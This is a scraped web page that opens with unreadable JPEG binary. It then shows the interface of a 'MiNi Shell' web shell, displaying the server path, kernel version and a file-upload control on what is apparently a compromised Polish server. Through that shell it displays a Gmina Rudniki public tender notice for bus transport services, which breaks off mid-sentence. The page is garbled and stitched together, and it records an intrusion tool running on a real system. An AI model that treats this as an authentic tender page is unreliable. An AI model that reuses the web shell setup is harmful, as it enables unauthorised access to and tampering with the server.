JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20221201/0047084901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi publicznego transportu zbiorowego w zakresie przewozów autobusowych o charakterze użyteczności publicznej na terenie Gminy Rudniki </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Rudniki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398586</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego 12A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rudniki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-325</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">34 3595072</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">34 3595013</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@rudniki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rudniki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi publicznego transportu zbiorowego w zakresie przewozów autobusowych o charakterze użyteczności publicznej na terenie Gminy Rudniki </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5ff18c47-7163-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00470849</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00329233/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Zakup usługi publicznego transportu zbiorowego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/rudniki <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w przedmiotowym postępowaniu odbywa się za pośrednictwem: platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/rudniki. Zamawiający dopuszcza, opcjonalnie komunikację między Zamawiającym a Wykonawcą przy użyciu: ePUAP:/GminaRudniki/SkrytkaESP oraz poczty elektronicznej: przetargi@rudniki.pl (za wyjątkiem oferty zał. Nr 1 do SWZ i oświadczeń wstępnych z art. 125 Pzp zał. Nr 4 do SWZ, które obligatoryjnie składane są za pośrednictwem Platformy zakupowej.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej opisane są szczegółowo w rozdziale XIII SWZ. Osoby uprawnione do porozumiewania się z Wykonawcami:<br/>1)	w zakresie proceduralnym: Małgorzata Gajda, e-mail: przetargi@rudniki.pl;<br/>2)	w zakresie merytorycznym: Jolanta Kubat tel., e-mail: komunalny@rudniki.pl<br/>W przypadku pytań technicznych dotyczących funkcjonowania i obsługi technicznej Platformy Zakupowej wskazuje kontakt z Centrum Wsparcia Klienta, które udziela wszelkich informacji związanych z procesem składania ofert, rejestracji oraz innych aspektów technicznych Platformy. Centrum wsparcia Klienta dostępne jest od poniedziałku do piątku w godz.: od 7:00 do 17:00 pod numerem telefonu (22)-101-02-02 lub e-mail cwk@platformazakupowa.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1)	administratorem Pani/Pana danych osobowych jest Wójt Gminy Rudniki.<br/>2)	administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@rudniki.pl.<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji - firmą przetwarzającą dane jest platformazakupowa.pl , którego operatorem jest Open Nexus Sp. z o.o.<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp oraz art. 80 ustawy Pzp (dane mogą być przekazywane poza teren UE)<br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy lub przez okres wskazany w umowie o dofinansowaniu,<br/>5)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym <br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>6)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO i nie będą profilowane.<br/>7)	posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego) – wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego;<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>8)	nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. b) i c) RODO. <br/>Pełna klauzula RODO w rozdziale II SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PRG.271.8.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I zamówienia pn. Usługi publicznego transportu zbiorowego w zakresie przewozów autobusowych o charakterze użyteczności publicznej na linii Nr 1 i Nr 2: <br/>Nr 1: Borek - Bobrowa - Cieciułów - Jaworzno - Julianpol – Mirowszczyzna<br/>Nr 2: Mirowszczyzna - Jaworzno - Jaworek – Rudniki<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w rozdziale IV SWZ oraz załącznikach do SWZ. Wykonawca może złożyć ofertę w odniesieniu do jednej lub wszystkich części zamówienia.<br/>Zamawiający nie określa liczby części zamówienia , na którą wykonawca może złożyć ofertę ani maksymalnej liczby części, na które zamówienie może zostać udzielone temu samemu Wykonawcy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34980000-0 - Bilety przewozowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość zwiększenia lub zmniejszenia zamówienia z zastosowaniem prawa opcji ( dla wszystkich części zamówienia), o którym mowa w art. 441 ust. 1 ustawy PZP. Prawem opcji jest możliwość skorzystania ze zwiększenia lub zmniejszenia ilości wykonania dodatkowych wozokilometrów do 10 % łącznej ilości podanej w zamówieniu podstawowym. Zaistnienie okoliczności, o której mowa wyżej, spowoduje zwiększenie/zmniejszenie wynagrodzenia należnego Wykonawcy z tytułu tej umowy. Zamawiający uzależnia możliwość skorzystania z prawa opcji od wystąpienia w trakcie realizacji zamówienia potrzeby zwiększenia ilości wozokilometrów w zakresie: <br/>1)	zwiększenia ilości kursów, <br/>2)	zwiększenia ilości wozokilometrów na danej trasie, <br/>3)	możliwości przedłużenia terminu realizacji zamówienia o dodatkowe dni świadczenia usług, <br/>4)	wystąpienia innych podobnych okoliczności mogących wystąpić w trakcie realizacji zamówienia skutkujące zwiększeniem ilości wozokilometrów. <br/> Do rozliczenia zamówienia w ramach prawa opcji będzie stosowana cena za 1 wkm wynikająca z oferty wykonawcy złożonej do zamówienia podstawowego. Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji umowy. W przypadku nie skorzystania przez Zamawiającego z prawa opcji, Wykonawcy nie przysługują żadne roszczenia z tego tytułu. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>a)	Cena ofertowa – 60 % (w PLN)<br/> <br/>b)	Czas podstawienia pojazdu zastępczego – 20%<br/><br/>c)	Średni wiek pojazdów – 20%<br/><br/> gdzie 1% - 1 pkt<br/>Liczba punktów za kryterium ,,Cena oferty’’ będzie liczona wg. następującego wzoru :<br/><br/> Cx = (C min / Cbad ) x 60 pkt<br/> gdzie:<br/>-	Cx – ilość punktów przyznanej danej ofercie za cenę brutto (z VAT) ;<br/>-	Cmin – minimalna cena brutto ( z VAT ) zaoferowana w przetargu;<br/>-	Cbad - cena brutto (z VAT) podana przez oferenta dla którego wynik jest obliczany<br/>-	.<br/>Za kryterium cena oferty oferta może otrzymać maksymalnie 60 pkt. od jednego członka komisji przetargowej.<br/><br/>Liczba punktów za kryterium ,”Czas podstawienia pojazdu zastępczego’’ będzie liczona wg. następującego sposobu :<br/>Czas podstawienia autobusu zastępczego do 20 minut otrzyma 20 pkt<br/>Czas podstawienia autobusu zastępczego od 21 minut do 45 minut otrzyma 10 pkt<br/><br/><br/><br/>Za kryterium Czas podstawienia pojazdu zastępczego oferta może otrzymać maksymalnie 20 pkt. od jednego członka komisji przetargowej.<br/><br/><br/>Liczba punktów za kryterium ,”Średni wiek pojazdów” będzie liczona wg. następującego sposobu: będzie ustalona poprzez wyliczenie stosunku najniższej średniej wieku autobusów w badanych ofertach do średniego wieku autobusów w ofercie badanej i pomnożenie uzyskanego wyniku przez znaczenie procentowe kryterium, czyli wg poniższego wzoru:<br/>ŚWP= Najniższa średnia wieku autobusów w badanych ofertach/ średni wiek autobusów w ofercie badanej x 20<br/><br/>W celu ustalenia średniego wieku pojazdów Zamawiający wymaga wskazania przez wykonawcę w druku oferty 4 autobusów przewidzianych do realizacji podając rok produkcji wynikający z dowodu rejestracyjnego. Wskazane w ofercie autobusy muszą spełniać wymagane parametry techniczne .<br/>Wskazane autobusy nie mogą być wyprodukowane wcześniej niż w 2012 roku<br/>Przyjmuje się, że pojazd wyprodukowany w roku 2012 – 11 letni, w 2013 – 10 letni, w 2014 – 9 letni, w 2015 – 8 letni, w 2016 – 7 letni, w 2017 – 6 letni, w 2018 – 5 letni, w 2019 – 4 letni, w 2020 – 3 letni, w 2021 – 2 letni, w 2022 – to pojazd 1 roczny.<br/>Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 5 ustawy w sytuacji, gdy Wykonawca o ofercie zaoferuje do realizacji zamówienia pojazdy wyprodukowane wcześniej niż w 2012 roku oraz w przypadku niewypełnienia przez Wykonawcę w druku oferty pola określającego rok produkcji pojazdu.<br/><br/><br/>Za kryterium Średni wiek pojazdów osoby oferta może otrzymać maksymalnie 20 pkt. od jednego członka komisji przetargowej.<br/><br/> Łączna ocena ofert:<br/> Wx = Cx + CPPZx + ŚWPx<br/><br/><br/>Gdzie:<br/>-	Wx – wskaźnik oceny oferty<br/>-	Cx – ilość punktów przyznanych ofercie w kryterium „cena ofertowa”;<br/>-	CPPZx - ilość punktów przyznanych ofercie w kryterium „ czas podstawienia pojazdu zastępczego”.<br/>-	ŚWPx – ilość punktów przyznanych ofercie w kryterium „ Średni wiek pojazdów”<br/><br/><br/>2.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. <br/><br/>3.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. <br/><br/>4.	Maksymalna ilość punktów, jaką może otrzymać oferta wynosi 100 pkt., od 1 członka komisji przetargowej. Po dokonaniu oceny punkty przyznane przez każdego z członków komisji przetargowej będą zsumowane dla każdego z kryteriów oddzielnie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Średni wiek pojazdów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II zamówienia pn. Usługi publicznego transportu zbiorowego w zakresie przewozów autobusowych o charakterze użyteczności publicznej na linii Nr 3: Jelonki - Żytniów - Chwiły - Faustianka - Porąbki - Kuźnica - Łazy - Młyny - Rudniki. Szczegółowy opis przedmiotu zamówienia dla poszczególnych części zamówienia, jak również inne istotne elementy związane z opisem przedmiotu zamówienia podano w rozdziale nr IV SWZ.<br/>Wykonawca może złożyć ofertę w odniesieniu do jednej lub wszystkich części zamówienia.<br/>Zamawiający nie określa liczby części zamówienia , na którą wykonawca może złożyć ofertę ani maksymalnej liczby części, na które zamówienie może zostać udzielone temu samemu Wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34980000-0 - Bilety przewozowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość zwiększenia lub zmniejszenia zamówienia z zastosowaniem prawa opcji ( dla wszystkich części zamówienia), o którym mowa w art. 441 ust. 1 ustawy PZP. Prawem opcji jest możliwość skorzystania ze zwiększenia lub zmniejszenia ilości wykonania dodatkowych wozokilometrów do 10 % łącznej ilości podanej w zamówieniu podstawowym. Zaistnienie okoliczności, o której mowa wyżej, spowoduje zwiększenie/zmniejszenie wynagrodzenia należnego Wykonawcy z tytułu tej umowy. Zamawiający uzależnia możliwość skorzystania z prawa opcji od wystąpienia w trakcie realizacji zamówienia potrzeby zwiększenia ilości wozokilometrów w zakresie: <br/>1)	zwiększenia ilości kursów, <br/>2)	zwiększenia ilości wozokilometrów na danej trasie, <br/>3)	możliwości przedłużenia terminu realizacji zamówienia o dodatkowe dni świadczenia usług, <br/>4)	wystąpienia innych podobnych okoliczności mogących wystąpić w trakcie realizacji zamówienia skutkujące zwiększeniem ilości wozokilometrów. <br/> Do rozliczenia zamówienia w ramach prawa opcji będzie stosowana cena za 1 wkm wynikająca z oferty wykonawcy złożonej do zamówienia podstawowego. Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji umowy. W przypadku nie skorzystania przez Zamawiającego z prawa opcji, Wykonawcy nie przysługują żadne roszczenia z tego tytułu. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>a)	Cena ofertowa – 60 % (w PLN)<br/> <br/>b)	Czas podstawienia pojazdu zastępczego – 20%<br/><br/>c)	Średni wiek pojazdów – 20%<br/><br/> gdzie 1% - 1 pkt<br/>Liczba punktów za kryterium ,,Cena oferty’’ będzie liczona wg. następującego wzoru :<br/><br/> Cx = (C min / Cbad ) x 60 pkt<br/> gdzie:<br/>-	Cx – ilość punktów przyznanej danej ofercie za cenę brutto (z VAT) ;<br/>-	Cmin – minimalna cena brutto ( z VAT ) zaoferowana w 